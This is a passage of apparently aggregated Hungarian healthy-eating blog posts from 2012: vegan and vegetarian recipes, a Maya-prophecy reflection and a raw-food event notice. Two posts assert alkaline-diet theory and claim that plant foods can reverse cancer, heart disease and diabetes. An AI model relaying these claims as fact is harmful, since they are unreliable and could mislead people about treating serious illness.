lekenéséhez: 4 evőkanál növényi tejszín, 2-3 evőkanál méz vagy agave szirup. Először elkészítjük egyenként a töltelékeket. A darált diót a hozzávalókkal ( kivéve a lekvár), összekeverjük és lassú tűzön főzni kezdjük, állandó kavarás mellett. Amikor felrottyant, félre húzzuk és hozzá keverjük a lekvárt. Majd hűlni hagyjuk. A mák tölteléknél szintén összekeverjük a hozzávalókat ( kivéve az almák )és lassú tűzön, állandó kavarás mellett főzzük. Az almákat lereszeljük nagy lyukú reszelőn és utólag hozzákeverjük a töltelékhez, majd hűlni hagyjuk. A puding krém készítésénél a port először csomómentesen elkeverjük a növényi tejjel és utána hagyományos módon elkészítjük a pudingot. Fontos, hogy ne legyen túlságosan híg. Amíg hűlnek a krémek összegyúrjuk a tésztát. Először a száraz, majd a nedves hozzávalókkal keverjük össze és kézzel, vagy robotgéppel alaposan összedolgozzuk a tésztát. A hűtőben fél egy órát pihentetjük. Miután kivettük a hűtőből még egyszer alaposan összegyúrjuk kézzel a tésztát és kettő , kb. 0,5-1 cm vastagságú lapot nyújtunk ki belőle. Egy 26 cm-es átmérőjű torta forma segítségével két alapot szúrunk ki a tésztából. Az egyik az alja lesz, a másik a teteje. Az alját belehelyezzük a kapcsos torta formába, megszúrkáljuk egy villa segítségével. A forma oldalát is körbe bevonjuk tésztával, kézzel összedolgozzuk a torta alját az oldalával. Megtöltjük a töltelékekkel. Körbe csiga formában rakjuk a töltelékeket, vagy készíthetjük fele-fele arányban is megosztva a tortát a kétféle töltelékkel. Én a csiga formát választottam, így egy szeletben mind a három töltelék szerepel. Körbe ragjuk tetszőlegesen a diót vagy a mákot, utána következhet a dió vagy puding, vagy megcserélve, kinek mi a szimpatikus. A torta tetejét kiszúrtam fenyő mintájú süti kiszúróval és így helyeztem rá a lapot torta tetejére. Oldalát kézzel összedolgozzuk. A kivágott fenyő mintákkal díszítettem a fedő lapot. Majd növényi tejszínt elkeverünk mézzel, vagy agave sziruppal és ezzel kenjük le a tortát, hogy szép fénye legyen. Előmelegített sütőben 180 C fokon 25-30 percig sütjük. A torta ötletét itt találtam, amit természetesen megreformáltam! Fittanyuka
Maja jóslat?
Hosszú ideje minden területen és mindenféle ismerőnél beleütközöm a maja világvége jövendölésbe. Eleinte csöppet sem foglalkoztam vele, hiszen újra és újra felröppennek ilyen hírek, de valahogy ezt komolyabban vette az eddigieknél a környezetem. Nagyon sokakat foglalkoztat, és aggódnak is emiatt, illetve többen elgondolkoztak arról, hogyha nem is ezen a konkrét napon, de nincs túl messze valamiféle összeomlás. Sajnos nem kaptam még az új Nyitott szemmelből, hogy a kollégáknak juttassak belőle, mert abban állítólag van erre vonatkozóan egy jó cikk. Majd szombaton elolvasom. Biztosan jóval összeszedettebben fogalmazza meg az ezzel összefüggő gondolatait a szerző, mint én 1/2 11-kor, de miután a Híradó is ezt nyomta, valahogy kikívánkozott belőlem ez a pár sor. Ha visszamegyek a kályhához, és megnézem, mit mond a Biblia a fentiekkel kapcsolatban, könnyebb dolgom lesz. Először is kijelenti Máté 24:36-ban, hogy pontos idői meghatározást az ember nem tudhat, viszont azt is írja, hogy lesznek jelei, ráadásul egyre sűrűsödő figyelmeztető jelei. Pl. pont a fent említett fejezetben is részletezi ezt. A Híradó azt mondta, hogy elsötétedéssel, földrengésekkel, mindenfélével járhat a holnapi nap a jövendölés szerint. Nos, a Biblia ír ezekről, de pl. a földrengésekről úgy, hogy gyakran lesznek, és mindenfelé. Tehát nem csak a megszokott törésvonalak mentén. Ebből kifolyólag nem mondom, hogy ilyen események nem történhetnek a holnapi nap, hiszen nem tudjuk mi lesz megengedve a háttérben dolgozó gonosz erőknek. Azonban abban is biztos vagyok, hogy a többség holnapután, meg azután is fel fog kelni még egy jó darabig. Ez nem jelenti azt, hogy nem érdemes forgatni a gondolatainkban a témát. Nem elbagatellizálni szeretném, félre ne értsen senki, hiszen biztos vagyok abban, hogy lassan számot kell adnia az emberiségnek a tetteiről. Csak más nézőpontból is szerettem volna megvilágítani, illetve biztatólag leírni a fentieket. Továbbá annyit hozzátenni, hogyha erőtlen, és csüggedt az ember, és végképp nincs kilátása semmire, akkor érdemes felfelé néznie végre. Mert Ő ...Erőt ad a megfáradottnak, és az erőtlen erejét megsokasítja...
Újabb saláta: virsli-paprika-édeskömény
2012. december 19. Mindennapi ételeink
Hozzávalók: 1 üveg szójavirsli 1 fej édeskömény 2 kápia paprika 5-10 szem koktélparadicsom 1 póréhagyma -- 5 ek. 100% extra szűz olívaolaj 5 ek. víz 1 ek. sörélesztőpehely 1 ek. pritaminpaprika lekvár 3 gerezd fokhagyma édeskömény zöldje só - ízlés szerint Elkészítés: A virsliket, a paprikákat, póréhagymát és az édesköményt is julien-re vágjuk. Az öntet hozzávalóit összekeverjük és tálalás előtt a salátára öntjük.
Avokárókrémes – mangós pohárkrém kesutejszínnel
Hmmmm…. annyira finom, hogy nem lehet betelni az ízével. Ahogy az édes íz találkozik a savanykással … az kész ízorgia.
Ezt a finomságot, ezt a pohárkrémet készítettem ma magamnak.
Karácsonyi vendégváró finomságnak is megteszi, gyönyörű ünnepien fel lehet díszíteni.
Az alábbi rétegeket pakoltam egymásra a pohárban:
- alulra: csokis avokádókrém (érett, puha avokádó mézzel és kakaóporral összebotmixerezve)
- középre: mangópüré (érett, puha mangó összeturmixolva)
- felülre: kesutejszín (natúr kesudió, méz, víz, vanília por összeturmixolva, hogy sűrű masszát kapjunk).
A tetejét csokis avokádókrémmel, papaya darabkákkal díszítettem, és tettem még a pohárba oldalra 3 szelet kivit is.
Jó étvágyat!
Kézműves reform kekszek
2012. december 18. Lét-tudatos konyha
- Kézzel készített kekszek - Reform alapanyagokból: teljes kiőrlésű búza- vagy tönkölybúzaliszt, nádcukor, pálma- vagy kókuszzsír A következő ízesítésekben kaphatók: - mézeskalácsos (hagyományos vagy aprósütemény méretű) - mákos - diós - zabpehely-sütőtökös - kókuszos - kakaós - karobos (szentjánoskenyérmagpor) - sós-lenmagos Érdeklődni: renata.kalman*kukac*lettudatos.com
Bázikus élelmiszerek - néhány szó a lúgosításról
2012. december 17. Napló étkeinkről, életünkről
Ahogy korosodtam, és egyre jobb lett az egészségem, sokszor közel kerültem a savtalanítás, méregtelenítés, lúgosítás témához, de semmi ihletést nem éreztem ahhoz, hogy foglalkozzak vele. Természetgyógyászként viszont szükséges volt belemélyednem, majd a saját tapasztalataim alapján megérteni, és kihámozni a sok információból a számomra lényeges elemeket. Bázikus élelmiszereknek nevezzük azokat az ételeket, amelyeket miután feldolgozott az emésztőrendszerünk, bázisok maradnak vissza, így segítenek a sav-bázis egyensúly fenntartásában / helyreállításában. A legtöbb ásványi-anyag bázikus, például: kalcium, magnézium, nátrium. Az elején összefoglalva: zöldségek, gyümölcsök segítik szervezetünk normál működését, gyümölcsök esetén érdemes figyelni arra, mikor esszük :-) Ahogy kutatgattam a témában, többféle rendszerrel találkoztam, amik számomra lényeges elemekben is eltérhetnek egymástól, és lehet, hogy valakinek az egyik, míg a másiknak pont az ellenkezője jön be. Így nyilván itt is kicsit szubjektív leszek, és arra ösztönzök mindenkit, hogy életmódbeli változtatásait beszélje meg orvosával :-) (aztán, ha sokan megkérdezik az orvosukat, hátha ők is utánaolvasnak, és elkezdi érdekelni őket ez a téma...) Amiben többnyire egyetértenek: 1. A zöldségek fontosak étkezésünkben - sok bázikus ásványi anyagot tartalmaznak, ami a savtalanításhoz (lúgosításhoz) szükséges - rosttartalmuk segíti a méregtelenítést 2. A telített zsírok fogyasztása káros (savasítanak) 3. A túlzott fehérjefogyasztás savasít (abban már megoszlanak a vélemények, hogy minden fehérje, vagy csak az állati eredetű - szerintem mindenféle) És a különbségek: 4. Gyümölcsök savasítanak vagy lúgosítanak? Én azon a véleményen vagyok saját tapasztalatom alapján, hogy szinte minden gyümölcs jótékony hatású, 2 szabályt érdemes betartani: - gyümölcsöt magában eszünk, lehetőleg egyfélét egyszerre - különálló étkezésként, vagy étkezések előtt - főétkezés után fogyasztva hosszabb időt kell a gyomorban töltenie, cukor tartalma erjedésnek indul, így pedig tényleg savasít 5. Olajos magvak hatása - magas az ásványi anyag tartalmuk - ez segíti a lúgosítást - de magas az olaj és a fehérje tartalmuk - ezek pedig savasíthatnak olajos magvakat érdemes beáztatás után enni, mert a csírázás során az olaj-tartalmuk egy része könnyebben emészthető szénhidráttá alakul, míg más része zsírsavakra bomlik Én nem érzem jól magam, ha sok olajos magvat eszem... 6. Néhány tejtermék lúgosít alapvetően nem értek egyet a tejtermékek fogyasztásával, de a teljesség kedvéért ezt is le kellett írnom :-) Amit érdemes elolvasni (és szerintem a 2 nagyobb irányzat): Kurt Tepperwein: Savtalanítás - A fiatalság forrása (ez a könyv jobban tükrözi az én véleményemet) Dr. Robert O. Young - Shelley Redford Young: A pH Csoda Szép napot, és jó egészséget kívánok!
Vega karácsony - Mázas diós lencsefasírt
2012. december 16. Zizi kalandjai
Gyors közvélemény kutatást tartottam és meglepetésemre nem az édeset, a csokisat választottátok, hanem a vega fasírtot. Karácsony közeledtével folytatódik a vega karácsony, vagyis mi kerülhet vegetáriánus családok vagy vendégek elé az asztalra. Persze ezek az ételek karácsony után is megállják a helyüket. Igazán laktató fogás egy egyben sült, gazdag fasírt, sokféle körettel (ebből igyekszem két receptet is hozni még az ünnepek előtt) tálalva.
Tavaly a vörösáfonyás pisztácia mandula sült nagyon nagy sikert aratott, de a diósült is fantasztikus, megunhatatlan (húsevők sem hiszik el, hogy nincsen benne hús). A mostani egyben sültnek a zöld lencse adja az alapját, amely könnyen emészthető fehérjét tartalmaz. Ezenkívül került bele dió, mogyoró, kesudió, zöldségek, alma és fűszerek és ráadásul vegán. A tetejére egy balzsamecetes ketchup-os máz készült. Mi nagyon ritkán eszünk ketchup-ot, ezért ehhez a fasírthoz igyekeztem jó minőségűt beszerezni, amelyben semmi felesleges adalékanyag nincsen. Tápláló, laktató fogás kerekedett belőle.
Mázas diós lencsefasírt
(Recept néhány pontjában megváltoztatva: Oh She Glows)
Hozzávalók 6-8 főre:
Fasírthoz :
- 190 g zöld lencse
- 100 g dió
- 60 g törökmogyoró, kesudió vegyesen
- 3 evőkanál őrölt lenmag + 6 evőkanál víz
- 2 nagy fej vöröshagyma, felaprítva
- 3 gerezd fokhagyma, felaprítva
- 120 g répa, felaprítva
- 1 közepes alma, meghámozva, kimagozva, lereszelve
- 40 g zabliszt
- 60 g teljeskiörlésű kenyérmorzsa
- 1 teáskanál friss rozmaring, aprítva (szárított is használható)
- 1 teáskanál friss kakukkfű (szárított is használható)
- 1 teáskanál chili pehely (opcionális)
- 1/2 csokor petrezselyem, felaprítva
- só, bors
Balzsamecetes almás mázhoz :
- 60 ml ketchup
- 1 evőkanál juharszirup
- 2 evőkanál édesítetlen almaszósz
- 2 evőkanál balzsamecet
Egy lábasba tegyünk 750 ml vizet. Adjuk hozzá a zöld lencsét, sózzuk és főzzük meg 40-50 perc alatt. Egy kis tálkában keverjük össze az őrölt lenmagot a vízzel és hagyjuk állni 8-10 percig, amíg zselés állagú lesz (ezzel helyettesítjük a tojást). A diót, törökmogyorót és kesudiót száraz serpenyőben pirítsuk meg 6-8 perc alatt.
Megkönnyítettem a helyzetemet, hogy mindent konyhai robotgépben aprítottam fel, daráltam meg. Először a pirított diót, mogyorót és kesudiót, majd a vöröshagymát, fokhagymát, petrezselymet és répát. Ezeket öntsük egy nagy tálba, adjuk hozzá a lereszelt almát, a zöldfűszereket, a chili pelyhet, zablisztet és a kenyérmorzsát. A megfőtt lencsét szintén pürésítsük a robotgépben vagy tűrjük pépesre villával és adjuk a többi hozzávalóhoz. Ízesítsük sóval, borssal és jól keverjük össze a masszát.
Melegítsük elő a sütőt 180C fokra. Közben egy kis tálban keverjük össze a máz hozzávalóit.
Egy 23 cm hosszú püspökkenyér formát olajozzunk ki (ha szilikon formát használunk, akkor nem kell kiolajozni), kanalazzuk az aljára a máz 2/3-át úgy, hogy egyenletesen mindenhol betakarja. A fasírt keveréket nyomkodjuk a formába (nekem kicsit sok lett, így egy keveset meghagytam a masszából és fasírtot sütöttem belőle teflonserpenyőben). 180C fokon süssük 50-60 percig, amíg szép barna színű és ropogós lesz. Hagyjuk a formában hűlni kb. 10 percet, majd fordítsuk ki belőle és kanalazzuk a tetejére a maradék mázat.
Fittanyuka Karácsonyi Csomagajánlatok 2012
2012. december 16. Fittanyuka Blog
Ha még nem tudjátok milyen ajándékokkal kedveskedjetek Szeretteiteknek, de a voksotokat az egészséges életmód mellett tettétek le akkor íme az ajánlatom az én Angyalkámtól! A következő négy csomagot ajánlom idén a karácsonyfa alá: Fittanyuka
Avokádókrém (Guacamole)
2012. december 14. Vegetáriánus receptek
Szeretjük! Nyers, gyors, finom, laktató. Egyszerű és sokféleképp saját ízlésre formálható.
Alaprecept:
- 1 avokádó
- 1 gerezd fokhagyma
- 2 ek citromlé (citrom leve)
- 4 ek tejföl
- só, bors ízlés szerint
Végy 1 db szép, nagy, érett (puha) avokádót. Ha csak keményet találsz a boltban, szobahőmérsékleten pár nap alatt beérik ha banán mellé teszed, az még gyorsít az érési folyamaton. Szedd le a héját, ha érett rendkívül könnyen adja magát. Vágd ketté, szedd ki a magját (ha vállalkozó kedvű kertész vagy csíráztasd és ültesd el), a húsát pedig tedd bele egy kisebb kerámia vagy üvegtálba, majd törd össze villával. Jöhet a többi összetevő, reszelt fokhagyma, citrom, tejföl, fűszerek.
Most nem volt otthon citromunk, így francia magos mustárt választottam kiegészítőnek, amiből 2 evőkanálnyit tettem a krémbe nem bántam meg.
Van aki olajat is tesz bele, de mivel az avokádó növényi zsírtartalma kiemelkedően magas (25-30%) én ezt hanyagolom. További ötletek az ízesítésre: főtt tojás, paradicsom, paprika, vöröshagyma, póréhagyma, olíva bogyó, majonéz, zöldfűszerek, tabasco, chilli.
És lássuk, hogy a fentieken túl miért szerethető még az avokádó!
Az avokadó (Persea americana) Közép-Amerikában őshonos haszonnövény, melyet már 5000 évvel ezelőtt fogyasztottak az aztékok. Hozzánk (Európába) a spanyol hódítás közvetítésével került. Pár éve már nem kuriózum kishazánk boltjaiban sem. A babérfélék családjába tartozik, trópusi fán termő gyümölcs. Színe zöldes fekete, alakja körteformájú, héja fajtától függően sima vagy ráncolt.
Többszörösen telítetlen zsírsavakban gazdag, B-, C-, E- és A-vitamint tartalmaz, kitűnő antioxidáns. Az érett gyümölcs kiváló kálium- foszfor-, vas-, nátrium- valamint kalcium- és magnéziumforrás. Jó hatással van a szív- és érrendszeri problémákra, magas vérnyomásra, érelmeszesedésre, a koleszterin szintet csökkenti, csekély cukortartalma miatt a cukorbetegek számára is értékes, tápláló termés. B-vitaminjai segítik az agysejtek melatonin termelését. Savtartalma jelentéktelen, így elősegítheti a lúgosítást.
Az érett termésből magas A-, B1-, B2-, C- és E-vitamin tartalmú olajat préselnek, amit a kozmetikai iparban és étkezési célokra is használnak. Az érzékeny bőr kiváló táplálója, segíti az ekcéma gyógyulását is. A kőmag tejszerű nedve a levegővel érintkezve vörösre színeződik, ezért az indiánok tintának, textilfestéknek használták. Az avokádó szép, vörösesbarna fáját őshazájában épületfának, bútorok készítéséhez, esztergályos munkákhoz és fafaragásokhoz használják.
Bodolai Móni
Hagymás sütőtökkarikák őszi rizottóval
Pöpec, ez egy pöpec étel volt. Ízharmóniáiban fenséges jelzővel illethetem. Kinézetre is szép színes. Rágondolok és újra megkívánom. Ráadásul semmi komplikáció, csak könnyű műveletek sora, amivel mutatós, finom és egyedi ételt készíthetünk. Férjem annyiban besegített, hogy kanadai sütőtökünk egyikét karikákra vágta (kb. 1 centisekre) és ezután könnyebben meghámozta. Annyira szép karikácskák voltak, hogy eszembe nem jutott felkockázni, vagy hasábokat vágni belőlük.
A recept:
Hozzávalók:
- 1 kanadai sütőtök
- 2 fej lila hagyma
- 2 fej vörös hagyma
- 2 fej fehér saláta hagyma
- pár gerezd fokhagyma
- ételízesítő vagy só
- kevés olaj
Elkészítés:
A sütőtököt karikákra felvágjuk, a szükséges helyeken a magokat kiszedjük, a karikákat pedig pl. krumplihámozóval meghámozzuk. Olajjal kicsit kikenünk egy tepsit, belefektetjük a tökkarikákat, megszórjuk némi sóval vagy ételízesítővel és alufóliával lefedve elkezdjük sütni.
Közben meghámozzuk a hagymákat és szintén felkarikázzuk mindegyiket. Amikor a tökök félig megpuhultak, szétszórjuk rajtuk a hagymákat, majd visszatesszük az alufóliát a tepsi tetejére és tovább sütjük.
Amikor minden puha, alufólia nélkül még pár percet sütjük. Ezzel kész a sütőtökös rész.
Köretként valami nagyon egyszerű, de fenséges rizottó-félét alkottam.
Őszi rizottó
A recept:
Hozzávalók:
30 dkg barna rizs
víz
ételízesítő vagy só
kb. 1 maroknyi morzsolt kukorica
2-3 db édes paprika
Elkészítés:
Az alaposan megmosott rizst sós, vagy ételízesítős vízben feltesszük főni. Amikor már alig van leve, és a rizsszemek nagyjából megpuhultak, hozzáadunk úgy egy maroknyi (1 kisebb bögre) morzsolt kukoricát, és tovább főzzük. Közben a paprikákat apró darabokra felvágjuk és szintén hozzákeverjük a rizshez.
A paprikát még október végén vettem a Bosnyák piacon. Kápia paprika. Hideg helyen, szétterítve tárolom, így alig fonnyad, alig változik az állaga. Örülök neki, hogy így kibírja. Igaz, nem mindenhez használom fel, tartalékolok vele, amíg lehet, amíg tudok, mivel egyre drágább ez a számomra kedves paprikafajta.
Ebből a paprikából szeleteltem a rizottóba. Amúgy szoktam olykor darabolt paprikát is lefagyasztani. Épp ilyen ételekhez.
Céklás amazake
Az édességeknél az almát variálom még mindig folyamatosan, és úgy látszik, a lehetőségei határtalanok ? Hozzávalók személyenként: 1 maréknyi főtt barna jázminrizs 1 nagyobb alma 1 csipet vaníliapor 1 kk méz (csak ha nem elég édes az alma) 1/2 dl tiszta víz 1 kk fahéj 1/2 dl céklalé (a reggeli smoothie ból) Az almát megmossuk, [...]
Több zöldséggel a rák és a szívinfarktus ellen!
A vegetáriánus étkezés korántsem nyers répa és salátalevél rágcsálásából áll. A vega étrend kulináris élvezetei mellett a 2011-es Planeat című film arra is rámutat, hogy miért is rossz a túlzott mértékű állati eredetű fehérje fogyasztása egészségünk és környezetünk szempontjából. Ha nem vagy, és nem is akarsz vega lenni, akkor is érdemes továbbolvasni... Colin Campbell nagysikerű The China Study című könyve alapján készült alkotás nem száraz tudományos elméletekkel teletömködött, bealvós film, hanem igencsak élő műsor, profi szakácsokkal, akik gyorsan bebizonyítják a nézőknek, hogy ha másért nem, legalább az íncsiklandó falatokért érdemes vegának, vagy legalább is gyakoribb zöldségfogyasztónak lenni. A film háttéranyagát szolgáltató szakértők a tudomány különböző területeiről érkeztek. További információ a film a honlapján Dr. T. Colin Campbell tudományos pályája kezdetén, az 1950-es években a szegény környezetben nevelkedő, alultáplált gyerekeket vizsgálta. Ő is, mint kollégái a tudomány akkori állásának megfelelően, a nyugati típusú vagyis a magas állati fehérje bevitelén alapuló étrend alkalmazásában látták a megoldást. Tíz évvel később, az 1960-as években a Fülöp-szigetek lakóinak vizsgálata során Campbell arra lett figyelmes, hogy a gazdag családban nevelkedő gyerekek között, vagyis ott, ahol sok állati fehérjét fogyasztottak, magasabb volt a májrákos megbetegedések száma, mint a szegény családok esetében. Hosszú kutatás eredményeképpen Campbell végül is arra a következtetésre jutott, hogy a magas állati fehérje (hús, tejtermékek) bevitelén alapuló étrendek helyett inkább a növényi alapú élelmiszereket, illetve a növényi alapú táplálkozást kellene előnyben részesíteni. Kutatásainak eredményét, többek között a The China Study című könyvében foglalta össze. Célja az volt, hogy segítséget és útmutatást nyújtson a helyes táplálkozás útvesztőjében azok számára, akik valamilyen táplálkozással összefüggő betegségben (például cukorbetegség, elhízás, szív- és érrendszeri betegségek, rák) szenvednek és azok számára, akik szeretnék megelőzni e betegségek kialakulását. Campbell azt is felismerte, hogy a magas állati fehérje bevitel nagyobb valószínűséggel okoz rákos megbetegedéseket. Ugyanakkor azt is megállapította, hogy a növényi eredetű élelmiszerek fogyasztása képes megállítani illetve visszafordítani a már kialakult betegségeket, mint például a rákot-, a szív- és érrendszeri betegségeket vagy a cukorbetegséget. Arra a kérdésre pedig, hogy egészséges, kiegyensúlyozott táplálkozás esetén mennyi állati eredetű fehérjét fogyasszunk, Campbell azt tanácsolja, hogy semennyit. A táplálkozásunkban fontos szerepet játszó gabonafélék fogyasztásával kapcsolatban is mértékletességre figyelmezteti olvasóit a szerző. Főleg a finomított, tehát fehér lisztből készült termékek fogyasztásának a csökkentését javasolja. Dr. Caldwell Esselstyn a Cleveland-i klinika sebész orvosa az 1990-es évek elején hasonló következtetésre jutott, mint Campbell. Esselstyn szív- és érrendszeri betegségben szenvedő betegeit vizsgálta, és azt tapasztalta, hogy azok a betegek, akik táplálkozásukból teljes mértékben kiiktatták az állati fehérjék fogyasztását, képesek voltak megelőzni, illetve bizonyos esetekben megakadályozni állapotuk romlását. Professor Gidon Eshel, a Chicago-i Egyetem tanára környezetvédelmi szempontból vizsgálta a táplálkozási szokásokat, és arra a megállapításra jutott, hogy az állati eredetű élelmiszerek fogyasztásának mérséklése, pl. szokásos húsfogyasztásunk felére csökkentése is már igen sokat jelentene a környezetvédelem, illetve saját egészségünk védelme szempontjából. Forrás: Tudatos Vásárlók Egyesülete
Fűszeres birslekvár (vegán)
2012. november 28. Dulmina tündérkonyhája
Ez az illatos csemege jól jön majd az ünnepi süteményekhez, meg talán a fa alá is kerül belőle valakinek. Hozzávalók kb. 3 literhez 2 kg birsalma (tisztítva mérve - ha sok hibás meg kukacos van benne, akkor akár két-háromszorosa is lehet a szükséges mennyiség egészben) 2 érett körte vagy édes alma (kb. 20 dkg) 1 citrom 35 dkg gyümölcscukor 1 fahéjrúd 1 vaníliarúd Alaposan megmossuk a
Reform kókuszgolyó
2012. november 26. Fittanyuka Blog
Ez a közkedvelt kókuszgolyó recept annyira egyszerű, hogy akár a gyerekekkel együtt is készíthetjük. Nagy előnye, amellett hogy könnyen elkészíthető, hogy ez egy nyers desszert. Két fő összetevője van : a zabpehely és az alma. Hozzávalók: (kb. 30 db golyó) 10 dkg aprószemű,-lágy zabpehely 10 dkg kókuszreszelék 30 dkg lédús alma 1 evőkanál kakaópor késhegynyi őrölt fahéj édesítve mézzel vagy agave sziruppal ízlés szerint Az almát apró lyukú sajtreszelőn lereszeljük, hozzákeverjük a zabpelyhet, fahéjat, kókuszreszeléket, kakaót, édesítjük ízlés szerint. Hagyjuk fél órát halni, hogy a zabpehely magába szívja az alma nedvességét. Vizes kézzel golyócskákat formázunk és kókuszreszelékben meghempergetjük őket. Fittanyuka
Mazsolás – aszalt vörös áfonyás kuszkusz magvakkal
Gyerekeknek laktató uzsonna készült, hamis császármorzsa kuszkuszból.
Alapanyagként a DM-ben kapható Alnatura kuszkuszt használtam.
Édes-mézesen készítettem.
Hozzávalók: 1 rész kuszkusz (durum búza töret), 2 rész folyadék (nálam zabtej és víz felesben), méz, xilit ízlés szerint, mazsola, aszalt vörös áfonya, mandula, kesudió
Elkészítés: Egy lábosba tesszük a kuszkuszt, a mézet, xilitet és az aszalt gyümölcsöket. A folyadékot felforraljuk, majd forrón a kuszkuszra öntjük. 10 percig várunk, míg a kuszkusz megduzzad és megpuhul. Magvakkal tálalhatjuk.
Megjegyzés: ha nyers mézet tudsz szerezni, akkor azt utólag keverd a masszához, hogy ne károsodjon.
Az alapanyag: kuszkusz, (durum búza töret)
Készülőben …
A végeredmény:
Shiitake gombás zöldségleves kölessel
2012. november 23. Csatni és Umeboshi: Jógakonyha
Lényegében maradékokból készült, volt itthon még 3 szem friss shiitake gomba, sárgarépa, fehérrépa, vöröshagyma. Ezeket felszeleteltem, majd összefőztem. Került bele még egy fél kocka bio vegeta és a legvégén néhány kanál főtt köles. Tálaláskor egy kevés reszelt natur tofuval gazdagítva. Finom volt, kissé édeskés ízű.
Nyers vegán putluck jógával! November 24. 14 órától
2012. november 22. Nyersétel akadémia
Mit is jelent az a szó, hogy “potluck”?
Egy különleges találkozót jelent, ahol hasonló érdeklődésű emberek összejönnek, beszélgetnek, megosztják élményeiket, gondolataikat. És jó magyar szokás szerint, itt is eszünk, iszunk, hiszen ez a közös érdeklődés éppen az ételek köré irányul: közös bennünk az, hogy mindannyian szeretjük a nyers zöldségek ízét, a nyers édességeket, leveseket, salátákat, stb…
Minden vendég hoz egy tál élő, nyers ételt, ami lehet bármi, ami növényi, feldolgozatlan alapanyagokból sütés és főzés nélkül készült. Ezeket az ételeket közösen fogjuk elfogyasztani a beszélgetés után.
A mostani potluck még különlegesebb, mint az eddigiek, mert előtte Gauranga Das, az Atma Center jógaoktatója fog nekünk egy remek jógaórát tartani!
a program:
14 órától jóga
15 órától potluck
átrendezzük a szobát “jógázósról” “evősre”
kipakoljuk az ételeket az asztalra
beszélgetés, mindenki elmondja, honnan jött, mit hozott
közösen elfogyasztjuk az ételeket
A belépő 1000 forint, ha hozol magaddal egy tál élő ételt.
Ha üres kézzel jössz, akkor 2000 forint (majd én készítek helyetted is valami finomságot)
Jelentkezz nálam itt: gitta@nyersetelakademia.hu
vagy telefonon: 30 9848931
Címünk: Budapest, XIII. Tátra utca 11. 1. emelet 1. 22. kapucsengő
Várunk szeretettel!
Sütőtökös darázsfészek rózsaborssal
2012. november 20. Fittanyuka Blog
Az őszi Fittanyuka főzőtanfolyamon legnagyobb sikere a desszertnek volt, ahogy lenni szokott:)! A darázsfészek nagymamáink süteménye a békebeli időkből. Annyit tettem, hogy az alapanyagokat mind olyanokra cseréltem le amelyek az egészségünket szolgálják. Most ezt a receptet meghagytam ahogy az eredeti is készül: kelt tésztával. Viszont sokszor elég kevesebb élesztő, mint amennyit a receptek írnak. Ha nem muszáj az élesztő gombákat minimalizáljuk, ne tápláljuk a candidáinkat. Tészta: Hozzávalók: 300 g világos tönkölyliszt 1,5 dl növényi tej 0,5 g élesztő, vagy 1 tasak bio, szárított élesztő 50 g olvasztott bio margarin 1 kk méz víz Sütőtökös töltelék: Hozzávalók: 500 g kockára vágott sütőtök 50 g bio margarin 1 kk rózsa bors összetörve 3 evőkanál méz 1/2 kk őrölt fahéj 2 evőkanál vanília szirup Először az élesztőt elkeverjük a langyos tejjel és ezt a liszthez keverjük, hozzáadjuk a mézet és az olvasztott margarint. Az egészet összegyúrjuk, addig gyúrjuk, míg a tészta elválik az edény falától, ha szükséges szórunk hozzá kevés lisztet. Meleg helyen letakarva kelesztjük. Addig elkészítjük a tölteléket. A kockára vágott sütőtököt a margarinon puhára pároljuk, fűszerezzük a tört rózsaborssal, fahéjjal, vanília sziruppal, vagy őrölt bourbon vaníliával. Villával enyhén összetörjük, édesítjük a mézzel. A megkelt tésztát újra átgyúrjuk kissé és kinyújtjuk, kb. 1 cm-es vastagságúra. Megkenjük a sütőtökös masszával és óvatosan feltekerjük. Késsel 12 darab csigát vágunk,-szeletelünk. Egy 26 cm-es kapcsos tortaformát kilisztezünk és körbe elkezdjük lerakni a csigákat. Amikor elfogytak, a tetejüket meglocsoljuk mézzel elkevert növényi tejszínnel. Előmelegített sütőben 180 C fokon 30 percig sütjük. Fittanyuka
Zserbó árpából (sütés nélkül 30 perc alatt)
Juditnak ajánlom ezt a desszertet, jobban mondva receptet, aki az előző nyáron (2011) kóstolta meg nálunk ezt a remek finomságot. Csak hogy a több Judit ismerősöm közül magára ismerjen biztosan, elárulom azt is, hogy azon a nyáron egy kellemes hétvégét töltöttünk el együtt, kirándultunk, libegőztünk, a János-hegyet jártuk be. Szóval Juditnak nagyon ízlett ez a csemege és most végre újból elkészítettem (majdnem másfél év után, pedig nagyon finom!), így megosztom a közönséggel is. Másik Judit barátnőmnek is ajánlom, amennyiben gluténmentes diétájában fogyaszthat árpát. :) A recept: Hozzávalók: - 50 dkg árpa - 2 evőkanál biocsicsóka-sűrítmény (elhagyható) - édesítőszer (méz, gyümölcscukor, nyírfacukor, stb. - ki mit használ) - karobpor vagy kakaópor - baracklekvár - darált dió - víz Elkészítés: Az árpát alaposan megmossuk, az a jó, ha van időnk arra, hogy áztassuk. Egy éjszakát vagy legalább pár órát. Ha nincs rá mód, akkor a megmosott árpát feltesszük főzni. Áztatás esetén gyorsabban megfő. A megfőtt árpához hozzákeverjük a biocsicsóka-sűrítményt, majd addig édesítjük, míg megfelelő édest ízt elérjük. Három egyenlő részre osztjuk. Az első adagot leterítjük egy picit mélyebb tálba. Nekem jénai üvegedényem jutott erre a célra. Megkenjük baracklekvárral. Ismét egy adag árpával befedjük. Szórunk rá darált diót, amit előtte szintén édesítünk. Ha mézzel keverjük össze a diót, akkor miután a dióval megszórtuk az árpát, akkor csurgatjuk rá a mézet (ne túl vastagon). Az utolsó adag árpát is elterítjük a diós rétegen és ezt karobos vagy kakaós mázzal egyenletesen leöntjük. Karobos máz: - Karob - méz vagy gyümölcscukor, nyírfacukor, stb. - ki mit használ - víz A karobport kikeverjük a cukorral, majd kevés vizet öntünk hozzá és felmelegítjük. Addig melegítjük, míg egy picit sűrűbbé - olvasztott csoki állagúvá nem válik. Fényes lesz a máz, ha pár csepp olajat is keverünk hozzá. A desszertet pár órára hűtőbe tesszük. Tálalásnál gyümölcsöt tehetünk a tetejére.
Almás pite ikszedik változat
